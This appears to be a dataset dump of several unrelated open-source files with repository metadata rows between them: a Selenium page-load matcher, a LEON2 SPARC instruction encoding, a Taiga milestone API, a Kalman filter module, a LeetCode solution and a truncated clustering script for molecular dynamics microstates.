histogramMagnitude(catalog_, region)
region = "Kansai"
histogramMagnitude(catalog_, region)
region = "Tohoku"
histogramMagnitude(catalog_, region)
region = "EastJapan"
histogramMagnitude(catalog_, region)
if __name__ == "__main__":
main()
| bsd-3-clause | 2,488,482,629,625,943,600 | 35.036364 | 140 | 0.604945 | false |
Skyscanner/pages | test/utils/hamcrest_matchers.py | 1 | 2357 | ############################################################################
# Copyright 2015 Skyscanner Ltd #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
############################################################################
from hamcrest.core.base_matcher import BaseMatcher
from selenium.common.exceptions import TimeoutException
from pages.page import Page
DEFAULT_POLLING_TIME = 0.5
DEFAULT_TIMEOUT = 25
class PageIsLoaded(BaseMatcher):
def __init__(self, timeout):
BaseMatcher.__init__(self)
self.timeout = timeout
self.polling = DEFAULT_POLLING_TIME
self.page_name = None
def _matches(self, page):
self.page_name = page.name
if isinstance(page, Page):
try:
page.wait_until_loaded(self.timeout, self.polling)
return True
except TimeoutException:
return False
def describe_to(self, description):
        description.append_text("Expected page {0} to load within {1} seconds".format(self.page_name, str(self.timeout)))
def describe_mismatch(self, item, mismatch_description):
mismatch_description.append_text('page load timed out.')
def with_timeout(self, timeout):
self.timeout = timeout
return self
def with_polling(self, polling):
self.polling = polling
return self
def is_loaded(timeout=30):
return PageIsLoaded(timeout)
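# Typical usage with PyHamcrest (sketch; `page` is assumed to be a pages.page.Page subclass):
#     from hamcrest import assert_that
#     assert_that(page, is_loaded(timeout=10).with_polling(0.5))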
| apache-2.0 | -6,174,321,162,460,390,000 | 39.637931 | 116 | 0.517183 | false |
socrocket/trap-gen | processors/LEON2/LEONCoding.py | 1 | 5555 | ################################################################################
#
# _/_/_/_/_/ _/_/_/ _/ _/_/_/
# _/ _/ _/ _/_/ _/ _/
# _/ _/ _/ _/ _/ _/ _/
# _/ _/_/_/ _/_/_/_/ _/_/_/
# _/ _/ _/ _/ _/ _/
# _/ _/ _/ _/ _/ _/
#
# @file LEONCoding.py
# @brief This file is part of the TRAP example processors.
# @details Instruction coding definition file for the LEON2.
# @author Luca Fossati
# @date 2008-2013 Luca Fossati
# @copyright
#
# This file is part of TRAP.
#
# TRAP is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# or see <http://www.gnu.org/licenses/>.
#
# (c) Luca Fossati, [email protected], [email protected]
#
################################################################################
import trap
#---------------------------------------------------------
# Instruction Encoding
#---------------------------------------------------------
# Let's now start with defining the instructions, i.e. their bitstring and
# mnemonic and their behavior. Note the zero* field: it is a special identifier and it
# means that all those bits have value 0; the same applies for one*
# As stated on page 44 of "The SPARC Architecture Manual V8" there are
# mainly 6 different format types
# Call instruction format
call_format = trap.MachineCode([('op', 2), ('disp30', 30)])
call_format.setBitfield('op', [0, 1])
# Branch and sethi instructions format
b_sethi_format1 = trap.MachineCode([('op', 2), ('rd', 5), ('op2', 3), ('imm22', 22)])
b_sethi_format1.setBitfield('op', [0, 0])
b_sethi_format1.setVarField('rd', ('REGS', 0), 'out')
b_sethi_format2 = trap.MachineCode([('op', 2), ('a', 1), ('cond', 4), ('op2', 3), ('disp22', 22)])
b_sethi_format2.setBitfield('op', [0, 0])
# Memory instruction format
mem_format1 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('zero', 1), ('asi', 8), ('rs2', 5)])
mem_format1.setBitfield('op', [1, 1])
mem_format1.setVarField('rs1', ('REGS', 0), 'in')
mem_format1.setVarField('rs2', ('REGS', 0), 'in')
mem_format2 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('one', 1), ('simm13', 13)])
mem_format2.setBitfield('op', [1, 1])
mem_format2.setVarField('rs1', ('REGS', 0), 'in')
# Store Barrier format
stbar_format = trap.MachineCode([('op', 2), ('zero', 5), ('op3', 6), ('rs1', 5), ('zero', 14)])
stbar_format.setBitfield('op', [1, 0])
stbar_format.setBitfield('op3', [1, 0, 1, 0, 0, 0])
stbar_format.setBitfield('rs1', [0, 1, 1, 1, 1])
# logical and remaining instructions format
dpi_format1 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('zero', 1), ('asi', 8), ('rs2', 5)])
dpi_format1.setBitfield('op', [1, 0])
dpi_format1.setVarField('rd', ('REGS', 0), 'out')
dpi_format1.setVarField('rs1', ('REGS', 0), 'in')
dpi_format1.setVarField('rs2', ('REGS', 0), 'in')
dpi_format2 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('one', 1), ('simm13', 13)])
dpi_format2.setBitfield('op', [1, 0])
dpi_format2.setVarField('rd', ('REGS', 0), 'out')
dpi_format2.setVarField('rs1', ('REGS', 0), 'in')
# Format for reading special instructions
read_special_format = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('asr', 5), ('zero', 14)])
read_special_format.setBitfield('op', [1, 0])
read_special_format.setVarField('rd', ('REGS', 0), 'out')
# Format for writing special instructions
write_special_format1 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('zero', 9), ('rs2', 5)])
write_special_format1.setBitfield('op', [1, 0])
write_special_format1.setVarField('rs1', ('REGS', 0), 'in')
write_special_format1.setVarField('rs2', ('REGS', 0), 'in')
write_special_format2 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('one', 1), ('simm13', 13)])
write_special_format2.setBitfield('op', [1, 0])
write_special_format2.setVarField('rs1', ('REGS', 0), 'in')
# Trap on integer condition code format
ticc_format1 = trap.MachineCode([('op', 2), ('reserved1', 1), ('cond', 4), ('op3', 6), ('rs1', 5), ('zero', 1), ('asi', 8), ('rs2', 5)])
ticc_format1.setBitfield('op', [1, 0])
ticc_format1.setVarField('rs1', ('REGS', 0), 'in')
ticc_format1.setVarField('rs2', ('REGS', 0), 'in')
ticc_format2 = trap.MachineCode([('op', 2), ('reserved1', 1), ('cond', 4), ('op3', 6), ('rs1', 5), ('one', 1), ('reserved2', 6), ('imm7', 7)])
ticc_format2.setBitfield('op', [1, 0])
ticc_format2.setVarField('rs1', ('REGS', 0), 'in')
# Coprocessor of fpu instruction format
coprocessor_format = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('opf', 9), ('rs2', 5)])
coprocessor_format.setBitfield('op', [1, 0])
coprocessor_format.setVarField('rd', ('REGS', 0), 'out')
coprocessor_format.setVarField('rs1', ('REGS', 0), 'in')
coprocessor_format.setVarField('rs2', ('REGS', 0), 'in')
| gpl-3.0 | 6,424,995,192,659,470,000 | 45.680672 | 142 | 0.576598 | false |
bdang2012/taiga-back-casting | taiga/projects/milestones/api.py | 1 | 6149 | # Copyright (C) 2014-2015 Andrey Antukh <[email protected]>
# Copyright (C) 2014-2015 Jesús Espino <[email protected]>
# Copyright (C) 2014-2015 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.apps import apps
from django.db.models import Prefetch
from taiga.base import filters
from taiga.base import response
from taiga.base.decorators import detail_route
from taiga.base.api import ModelCrudViewSet, ModelListViewSet
from taiga.base.api.utils import get_object_or_404
from taiga.base.utils.db import get_object_or_none
from taiga.projects.notifications.mixins import WatchedResourceMixin, WatchersViewSetMixin
from taiga.projects.history.mixins import HistoryResourceMixin
from taiga.projects.votes.utils import attach_total_voters_to_queryset, attach_is_voter_to_queryset
from taiga.projects.notifications.utils import attach_watchers_to_queryset, attach_is_watcher_to_queryset
from . import serializers
from . import models
from . import permissions
import datetime
class MilestoneViewSet(HistoryResourceMixin, WatchedResourceMixin, ModelCrudViewSet):
serializer_class = serializers.MilestoneSerializer
permission_classes = (permissions.MilestonePermission,)
filter_backends = (filters.CanViewMilestonesFilterBackend,)
filter_fields = ("project", "closed")
queryset = models.Milestone.objects.all()
def list(self, request, *args, **kwargs):
res = super().list(request, *args, **kwargs)
self._add_taiga_info_headers()
return res
def _add_taiga_info_headers(self):
try:
project_id = int(self.request.QUERY_PARAMS.get("project", None))
project_model = apps.get_model("projects", "Project")
project = get_object_or_none(project_model, id=project_id)
except TypeError:
project = None
if project:
opened_milestones = project.milestones.filter(closed=False).count()
closed_milestones = project.milestones.filter(closed=True).count()
self.headers["Taiga-Info-Total-Opened-Milestones"] = opened_milestones
self.headers["Taiga-Info-Total-Closed-Milestones"] = closed_milestones
def get_queryset(self):
qs = super().get_queryset()
# Userstories prefetching
UserStory = apps.get_model("userstories", "UserStory")
us_qs = UserStory.objects.prefetch_related("role_points",
"role_points__points",
"role_points__role")
us_qs = us_qs.select_related("milestone",
"project",
"status",
"owner",
"assigned_to",
"generated_from_issue")
us_qs = self.attach_watchers_attrs_to_queryset(us_qs)
if self.request.user.is_authenticated():
us_qs = attach_is_voter_to_queryset(self.request.user, us_qs)
us_qs = attach_is_watcher_to_queryset(self.request.user, us_qs)
qs = qs.prefetch_related(Prefetch("user_stories", queryset=us_qs))
# Milestones prefetching
qs = qs.select_related("project", "owner")
qs = self.attach_watchers_attrs_to_queryset(qs)
qs = qs.order_by("-estimated_start")
return qs
def pre_save(self, obj):
if not obj.id:
obj.owner = self.request.user
super().pre_save(obj)
@detail_route(methods=['get'])
def stats(self, request, pk=None):
milestone = get_object_or_404(models.Milestone, pk=pk)
self.check_permissions(request, "stats", milestone)
total_points = milestone.total_points
milestone_stats = {
'name': milestone.name,
'estimated_start': milestone.estimated_start,
'estimated_finish': milestone.estimated_finish,
'total_points': total_points,
'completed_points': milestone.closed_points.values(),
'total_userstories': milestone.user_stories.count(),
'completed_userstories': len([us for us in milestone.user_stories.all() if us.is_closed]),
'total_tasks': milestone.tasks.all().count(),
'completed_tasks': milestone.tasks.all().filter(status__is_closed=True).count(),
'iocaine_doses': milestone.tasks.filter(is_iocaine=True).count(),
'days': []
}
current_date = milestone.estimated_start
sumTotalPoints = sum(total_points.values())
optimal_points = sumTotalPoints
milestone_days = (milestone.estimated_finish - milestone.estimated_start).days
optimal_points_per_day = sumTotalPoints / milestone_days if milestone_days else 0
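        # e.g. 30 total points over a 10-day sprint gives 3 points per day, so the ideal
        # burndown line below goes 30, 27, 24, ... (illustrative numbers only)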
while current_date <= milestone.estimated_finish:
milestone_stats['days'].append({
'day': current_date,
'name': current_date.day,
'open_points': sumTotalPoints - sum(milestone.closed_points_by_date(current_date).values()),
'optimal_points': optimal_points,
})
current_date = current_date + datetime.timedelta(days=1)
optimal_points -= optimal_points_per_day
return response.Ok(milestone_stats)
class MilestoneWatchersViewSet(WatchersViewSetMixin, ModelListViewSet):
permission_classes = (permissions.MilestoneWatchersPermission,)
resource_model = models.Milestone
| agpl-3.0 | 812,098,269,733,922,800 | 41.986014 | 109 | 0.650887 | false |
DStauffman/dstauffman | dstauffman/estimation/kalman.py | 1 | 8438 | r"""
Functions related to Kalman Filter analysis.
Notes
-----
#. Written by David C. Stauffer in April 2019.
"""
#%% Imports
import doctest
import unittest
from dstauffman import HAVE_NUMPY
from dstauffman.numba import ncjit
from dstauffman.estimation.linalg import mat_divide
if HAVE_NUMPY:
import numpy as np
#%% Functions - calculate_kalman_gain
def calculate_kalman_gain(P, H, R, *, use_inverse=False, return_innov_cov=False):
r"""
Calculates K, the Kalman Gain matrix.
Parameters
----------
P : (N, N) ndarray
Covariance Matrix
    H : (A, N) ndarray
        Measurement Update Matrix
    R : (A, A) ndarray
        Measurement Noise Matrix
    use_inverse : bool, optional
        Whether to explicitly calculate the inverse or not, default is False
    return_innov_cov : bool, optional
        Whether to also return the innovation covariance matrix, default is False
    Returns
    -------
    K : (N, A) ndarray
        Kalman Gain Matrix
    Pz : (A, A) ndarray
        Innovation Covariance Matrix
Notes
-----
#. Written by David C Stauffer in December 2018.
Examples
--------
>>> from dstauffman.estimation import calculate_kalman_gain
>>> import numpy as np
>>> P = 1e-3 * np.eye(5)
>>> H = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1], [0.5, 0.5, 0.5], [0, 0, 0.1]]).T
>>> R = 0.5 * np.eye(3)
>>> K = calculate_kalman_gain(P, H, R)
"""
# calculate the innovation covariance
Pz = H @ P @ H.T + R
if use_inverse:
# explicit version with inverse
K = (P @ H.T) @ np.linalg.inv(Pz)
else:
# implicit solver
K = mat_divide(Pz.T, (P @ H.T).T).T
# return desired results
if return_innov_cov:
return (K, Pz)
return K
@ncjit
def calculate_kalman_gain_opt(P, H, R):
r"""Calculate the Kalman gain, in a way optimized for use with numba."""
Pz = H @ P @ H.T + R
K = mat_divide(Pz.T, (P @ H.T).T).T
return (K, Pz)
#%% Functions - calculate_prediction
@ncjit
def calculate_prediction(H, state, const=None):
r"""
Calculates u, the measurement prediction.
Parameters
----------
H : (A, B) ndarray
Measurement Update matrix
state : (A, ) ndarray
State vector
const : (A, ) ndarray, optional
Constant state vector offsets
Returns
-------
(A, ) ndarray
Delta state vector
Notes
-----
#. Written by David C. Stauffer in September 2020.
Examples
--------
>>> from dstauffman.estimation import calculate_prediction
>>> import numpy as np
>>> H = np.array([[1., 0.], [0., 1.], [0., 0.]])
>>> state = np.array([1e-3, 5e-3])
>>> u_pred = calculate_prediction(H, state)
>>> print(u_pred) # doctest: +NORMALIZE_WHITESPACE
[0.001 0.005 0. ]
"""
if const is None:
return H @ state
return H @ (state + const)
#%% Functions - calculate_innovation
@ncjit
def calculate_innovation(u_meas, u_pred):
r"""
Calculates z, the Kalman Filter innovation.
Parameters
----------
u_meas : (A, ) ndarray
Measured state vector
u_pred : (A, ) ndarray
Predicted state vector
Returns
-------
(A, ) ndarray
Kalman Filter innovation
Notes
-----
#. Written by David C. Stauffer in September 2020.
Examples
--------
>>> from dstauffman.estimation import calculate_innovation
>>> import numpy as np
>>> u_meas = np.array([1., 2.1, -3.])
>>> u_pred = np.array([1.1, 2.0, -3.1])
>>> z = calculate_innovation(u_meas, u_pred)
>>> with np.printoptions(precision=8):
... print(z) # doctest: +NORMALIZE_WHITESPACE
[-0.1 0.1 0.1]
"""
return u_meas - u_pred
#%% Functions - calculate_normalized_innovation
@ncjit
def calculate_normalized_innovation(z, Pz, use_inverse=False):
r"""
Calculates nu, the Normalized Kalman Filter Innovation.
Parameters
----------
z : (A, ) ndarray
Kalman Filter innovation
Pz : (A, A) ndarray
Kalman Filter innovation covariance
use_inverse : bool, optional
Whether to explicitly calculate the inverse or not, default is False
Returns
-------
(A, ) ndarray
Normalized innovation
Notes
-----
#. Written by David C. Stauffer in September 2020.
Examples
--------
>>> from dstauffman.estimation import calculate_normalized_innovation
>>> import numpy as np
>>> z = np.array([0.1, 0.05, -0.2])
>>> Pz = np.array([[0.1, 0.01, 0.001], [0.01, 0.1, 0.001], [0., 0., 0.2]])
>>> nu = calculate_normalized_innovation(z, Pz)
>>> with np.printoptions(precision=8):
... print(nu) # doctest: +NORMALIZE_WHITESPACE
[ 0.96868687 0.41313131 -1. ]
"""
if use_inverse:
return np.linalg.inv(Pz) @ z
return mat_divide(Pz, z)
#%% Functions - calculate_delta_state
@ncjit
def calculate_delta_state(K, z):
r"""
Calculates dx, the delta state for a given measurement.
Parameters
----------
K : (A, B) ndarray
Kalman Gain Matrix
z : (A, ) ndarray
Kalman Filter innovation
Notes
-----
#. Written by David C. Stauffer in September 2020.
Examples
--------
>>> from dstauffman.estimation import calculate_delta_state
>>> import numpy as np
>>> K = np.array([[0.1, 0.01, 0.001], [0.01, 0.1, 0.001], [0., 0., 0.2]])
>>> z = np.array([0.1, 0.05, -0.2])
>>> dx = calculate_delta_state(K, z)
>>> with np.printoptions(precision=8):
... print(dx) # doctest: +NORMALIZE_WHITESPACE
[ 0.0103 0.0058 -0.04 ]
"""
return K @ z
#%% Functions - propagate_covariance
def propagate_covariance(P, phi, Q, *, gamma=None, inplace=True):
r"""
Propagates the covariance forward in time.
Parameters
----------
P :
Covariance matrix
phi :
State transition matrix
Q :
Process noise matrix
gamma :
Shaping matrix?
inplace : bool, optional, default is True
Whether to update the value inplace or as a new output
Returns
-------
(N, N) ndarray
Updated covariance matrix
Notes
-----
#. Written by David C. Stauffer in December 2018.
#. Updated by David C. Stauffer in July 2020 to have inplace option.
Examples
--------
>>> from dstauffman.estimation import propagate_covariance
>>> import numpy as np
>>> P = 1e-3 * np.eye(6)
>>> phi = np.diag([1., 1, 1, -1, -1, -1])
>>> Q = np.diag([1e-3, 1e-3, 1e-5, 1e-7, 1e-7, 1e-7])
>>> propagate_covariance(P, phi, Q)
>>> print(P[0, 0])
0.002
"""
if gamma is None:
out = phi @ P @ phi.T + Q
else:
out = phi @ P @ phi.T + gamma @ Q @ gamma.T
if inplace:
P[:] = out
else:
return out
@ncjit
def propagate_covariance_opt(P, phi, Q, gamma=None):
r"""Propagate the covariance in time, in a way optimized for use with numba."""
if gamma is None:
P[:] = phi @ P @ phi.T + Q
else:
P[:] = phi @ P @ phi.T + gamma @ Q @ gamma.T
#%% Functions - update_covariance
def update_covariance(P, K, H, *, inplace=True):
r"""
Updates the covariance for a given measurement.
Parameters
----------
P : (N, N) ndarray
Covariance Matrix
K : (N, ) ndarray
Kalman Gain Matrix
H : (A, N) ndarray
Measurement Update Matrix
inplace : bool, optional, default is True
Whether to update the value inplace or as a new output
Returns
-------
P_out : (N, N) ndarray
Updated Covariance Matrix
Notes
-----
#. Written by David C Stauffer in December 2018.
#. Updated by David C. Stauffer in July 2020 to have inplace option.
Examples
--------
>>> from dstauffman.estimation import update_covariance
>>> import numpy as np
>>> P = 1e-3 * np.eye(6)
>>> P[0, -1] = 5e-2
>>> K = np.ones((6, 3))
>>> H = np.hstack((np.eye(3), np.eye(3)))
>>> update_covariance(P, K, H)
>>> print(P[-1, -1])
-0.05
"""
out = (np.eye(*P.shape) - K @ H) @ P
if inplace:
P[:] = out
else:
return out
@ncjit
def update_covariance_opt(P, K, H):
r"""Propagate the covariance in time, in a way optimized for use with numba."""
P[:] = (np.eye(*P.shape) - K @ H) @ P
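#%% Functions - _example_measurement_update
def _example_measurement_update():  # pragma: no cover
    r"""
    Minimal sketch (added for illustration) of how the functions above chain together for a
    single Kalman measurement update.  This is an assumption about typical usage, not part of
    the original API; every numeric value below is made up.
    """
    phi    = np.eye(2)                      # state transition matrix (assumed)
    Q      = 1e-6 * np.eye(2)               # process noise (assumed)
    H      = np.array([[1., 0.]])           # measurement model (assumed)
    R      = np.array([[0.01]])             # measurement noise (assumed)
    P      = 1e-3 * np.eye(2)               # initial covariance (assumed)
    state  = np.array([0., 0.])
    u_meas = np.array([0.02])
    propagate_covariance(P, phi, Q)         # time update of P (in-place)
    K      = calculate_kalman_gain(P, H, R)
    u_pred = calculate_prediction(H, state)
    z      = calculate_innovation(u_meas, u_pred)
    dx     = calculate_delta_state(K, z)
    state  = state + dx
    update_covariance(P, K, H)              # measurement update of P (in-place)
    return (state, P)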
#%% Unit Test
if __name__ == '__main__':
unittest.main(module='dstauffman.tests.test_estimation_kalman', exit=False)
doctest.testmod(verbose=False)
| lgpl-3.0 | -4,143,109,021,988,057,000 | 24.263473 | 87 | 0.567907 | false |
tktrungna/leetcode | Python/range-sum-query-immutable.py | 1 | 1146 | """
QUESTION:
Given an integer array nums, find the sum of the elements between indices i and j (i <= j), inclusive.
Example:
Given nums = [-2, 0, 3, -5, 2, -1]
sumRange(0, 2) -> 1
sumRange(2, 5) -> -1
sumRange(0, 5) -> -3
Note:
You may assume that the array does not change.
There are many calls to sumRange function.
ANSWER:
prefix-sum accumulation: precompute cumulative sums once, so each sumRange(i, j) is answered
in O(1) as sum[j] - sum[i] + nums[i]
"""
class NumArray(object):
def __init__(self, nums):
"""
initialize your data structure here.
:type nums: List[int]
"""
self.nums = nums
self.sum = [0]*len(self.nums)
for i in xrange(len(nums)):
self.sum[i] = nums[i] if i == 0 else self.sum[i-1]+nums[i]
def sumRange(self, i, j):
"""
sum of elements nums[i..j], inclusive.
:type i: int
:type j: int
:rtype: int
"""
return self.sum[j]-self.sum[i]+self.nums[i]
# Your NumArray object will be instantiated and called as such:
# numArray = NumArray(nums)
# numArray.sumRange(0, 1)
# numArray.sumRange(1, 2)
if __name__ == '__main__':
numArray = NumArray([-2, 0, 3, -5, 2, -1])
print numArray.sumRange(0, 1)
| mit | -799,236,257,874,062,700 | 22.875 | 101 | 0.578534 | false |
stephenliu1989/HK_DataMiner | hkdataminer/Nystrom_code/microToMacroBySHC_v2.0b.py | 1 | 41931 | #!/usr/bin/env python
#######################################################
#Written by Daniel Silva
#Based in the original SHC code from Yuan YAO and Xuhui Huang:
# Proceedings of the Pacific Symposium on Biocomputing, 15, 228-239, (2010)
#
#Intended to be used in the SimTK project
#Ver. 1.5b 21/Apr/2011
#######################################################
import optparse
import sys
import linecache
import scipy.io
import numpy as np
#import colorsys
from pylab import *
from numpy import *
from scipy import *
from scipy.sparse import *
from scipy.sparse.linalg import *
from scipy.linalg import eig
from scipy.interpolate import interp1d
from scipy.sparse.linalg.eigen.arpack import *
def version():
print "(OUTPUT) Python SHC ver 2.01b"
#def licence():
def main():
version()
# licence()
p = optparse.OptionParser()
p.add_option('--outMicroCountMatrixName', '-c', default="microstateCountMatrix.mtx")
p.add_option('--lagstep', '-l', default="1")
p.add_option('--headDir', '-d', default="./")
p.add_option('--trajlist', '-t', default="-1")
p.add_option('--plevelsFile', '-p', default="plevels.shc")
p.add_option('--outMacrostateAssignementsMap', '-s', default="macrostateMap.map")
p.add_option('--writeMacroAssignments', '-w', default="0")
p.add_option('--optimumMacrostateSize', '-o', default="0.01")
p.add_option('--maximumAssignIterations', '-i', default="10")
p.add_option('--removeBarelyConnectedMicros', '-r', default="0")
p.add_option('--writeTCMtxt', '-x', default="0")
p.add_option('--scanModeTopDensity', '-a', default="0.0")
p.add_option('--inputMatrix', '-m', default="")
p.add_option('--outFlowGraphName', '-f', default="macroFlowGraph.dot")
p.add_option('--bJumpWindow', '-j', default="0")
p.add_option('--whichGap', '-g', default="1")
options, arguments = p.parse_args()
outMicroCountMatrixName = (options.outMicroCountMatrixName)
tLag = int(options.lagstep)
headDir = (options.headDir)
trajlistfiles = (options.trajlist)
pLevelsFilename = (options.plevelsFile)
outMacrostateAssignementsMap = (options.outMacrostateAssignementsMap)
optimumMacrostateSize = float(options.optimumMacrostateSize)
writeMAssignments = int(options.writeMacroAssignments)
maximumAssignIterations = int(options.maximumAssignIterations)
numRemoveBarelyConnectedMicros = int(options.removeBarelyConnectedMicros)
writeTCMtxt = int(options.writeTCMtxt)
scanModeTopDensity = float(options.scanModeTopDensity)
inputMatrix = (options.inputMatrix)
outFlowGraphName = (options.outFlowGraphName)
bJumpWindow = int(options.bJumpWindow)
chooseGap = int(options.whichGap)
#if (len(inputMatrix) == 0 ):
# originalMicrosCountM= getMicroTransitionsFromAssignements(tLag, headDir, trajlistfiles, bJumpWindow)
#else:
# print "(OUTPUT) ", ("Reading data from TCM file: \"%s\" ", inputMatrix)
# if ( linecache.getline(inputMatrix, 1).strip() == "%%MatrixMarket matrix coordinate integer general"):
# print "(OUTPUT) ", ("Detected sparce matrix in the Matrix Market format")
# originalMicrosCountM = scipy.io.mmread(inputMatrix)
# else:
# print "(OUTPUT) ", ("Detected matrix in raw txt format")
# originalMicrosCountM = genfromtxt(inputMatrix)
# originalMicrosCountM = lil_matrix(originalMicrosCountM)
originalMicrosCountM = scipy.io.mmread(inputMatrix)
#The code is made to use a float matrix, even if the input (transitions) are integers. This way is just convinient to avoid errors due to loosing floats
originalMicrosCountM = originalMicrosCountM.tocsc()/1.0
writeCountMatrix(originalMicrosCountM, outMicroCountMatrixName, "Writing microstates transition count matrix", writeTCMtxt)
if (numRemoveBarelyConnectedMicros > 0):
originalMicrosCountM = removeBarelyConnectedMicros(originalMicrosCountM, numRemoveBarelyConnectedMicros)
connectedMicrosCountM, connectedMicrosIndex = getConnectedMicrostates(originalMicrosCountM)
writeCountMatrix(connectedMicrosCountM, ("%s_connected" % outMicroCountMatrixName), "Writing connected microstates transition count matrix", 0)
connectedMicrosCountM_X = csc_matrix(connectedMicrosCountM + connectedMicrosCountM.conj().transpose())/2 ;
microstate_size = connectedMicrosCountM.sum(axis=1)
cumulativeSumOfRows = cumulativeDesityFunctionOfHeightFilter(microstate_size)
pLevels=[]
if ( scanModeTopDensity > 0.0 ):
pLevels = scanPlevels(cumulativeSumOfRows, connectedMicrosCountM_X, microstate_size, 0.01, 0.01, scanModeTopDensity, chooseGap)
else:
pLevels = readPlevels(pLevelsFilename, cumulativeSumOfRows)
clusters = zeros(len(pLevels), int)
levels = []
levelsLine=""
for i in range (0, len(pLevels)):
if ((sum(cumulativeSumOfRows<=pLevels[i])) > 2): #Detect and remove density levels with <10 microstate
levels.append(sum(cumulativeSumOfRows<=pLevels[i]))
levelsLine += ("%1.3f " % pLevels[i])
else:
print "(OUTPUT) ", ("Density level at \"%1.3f\" is empty or have to few microstates (<2), it was removed it from the analysis"% (pLevels[i]))
print "(OUTPUT) ", ("**SHC analysis will use %d density levels: %s" % (len(levels), levelsLine))
(aBettis, specGaps) = apBetti(connectedMicrosCountM_X, microstate_size, levels)
for i in range (0, len(levels)):
if (chooseGap < 1):
print "(OUTPUT) ", ("WARNING: The spectral gap choosen (1st, 2nd, etc) cannot have a value less than 1, automaticaly changing the gap (-g) to 1")
chooseGap=1
if (chooseGap > 1):
print "(OUTPUT) ", ("WARNING:You are using an spectral gap ( ) different to the 1st. Is this really what you want to do?")
clusters[i] = aBettis[i][chooseGap-1]
superLevels=superLevelSet(microstate_size, levels, clusters) #0 is IDs and 1 is IGs
(adja, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, ci, csize) = superMapper(connectedMicrosCountM_X, superLevels)
(cptLocalMax, cptGradFlow, cptEquilibriumEQ) = flowGrad(adja, levelIdx, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter)
writeFlowGraph(cptGradFlow, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, superLevels, outFlowGraphName, pLevels)
(ci, csize, fassign, T, Qmax, id_fuzzy) = optimumAssignment(connectedMicrosCountM_X, cptEquilibriumEQ, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, maximumAssignIterations)
writeMacrostateMap(outMacrostateAssignementsMap, originalMicrosCountM.shape[0], ci, connectedMicrosIndex)
if (writeMAssignments ==1):
writeMacroAssignments(tLag, headDir, trajlistfiles, ci, connectedMicrosIndex, originalMicrosCountM.shape[0])
print "(OUTPUT) ", ("Done with SHC!")
def scanPlevels(cumulativeSumOfRows, connectedMicrosCountM_X, microstate_size, start, incr, end, chooseGap):
print "(OUTPUT) ", "Will perform a scan to discover optimum density levels for SHC (EXPERIMENTAL)"
clustersScan = zeros(1, int)
pLevels=[]
pLevelsScan=[]
pLevelsScan.append(0)
pLevelSGQuality=[]
pLevelNumMacro=[]
tmpMaxNumMacro=0
tmpMaxGapQuality=0
testLevels = np.arange(start,end,incr)
for i in testLevels:
levelsScan = []
pLevelsScan[0] = i
specGapQuality=0
print "(OUTPUT) ", ("Testing Density level: \"%1.3f\" " % pLevelsScan[0])
if ((sum(cumulativeSumOfRows<=pLevelsScan[0])) > 1+chooseGap):
levelsScan.append(sum(cumulativeSumOfRows<=pLevelsScan[0]))
(aBettis, specGaps) = apBetti(connectedMicrosCountM_X, microstate_size, levelsScan)
clustersScan[0] = aBettis[0][0]
superLevels=superLevelSet(microstate_size, levelsScan, clustersScan) #0 is IDs and 1 is IGs
(adja, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, ci, csize) = superMapper(connectedMicrosCountM_X, superLevels)
print specGaps
specGapQuality = specGaps[0][chooseGap-1] - specGaps[0][chooseGap]
if ( (len(csize[0])) > tmpMaxNumMacro):
tmpMaxNumMacro = len(csize[0])
tmpMaxGapQuality = specGapQuality
pLevels.append(np.copy(pLevelsScan[0]))
pLevelSGQuality.append(np.copy(specGapQuality))
pLevelNumMacro.append(np.copy(tmpMaxNumMacro))
elif ( ((len(csize[0])) <= tmpMaxNumMacro) and (specGapQuality > tmpMaxGapQuality) ):
tmpMaxNumMacro = len(csize[0])
tmpMaxGapQuality = specGapQuality
pLevels[(len(pLevels)-1)] = pLevelsScan[0]
pLevelSGQuality[(len(pLevels)-1)] = specGapQuality
pLevelNumMacro[(len(pLevels)-1)] = len(csize[0])
else:
print "(OUTPUT) ", ("Skipping density level at \"%1.3f\" because it contains to few microstates ( <2 )" % pLevelsScan[0])
print "(OUTPUT) ", "Optimum density levels identified & num of macrostates per level:"
counter=0
for i in pLevels:
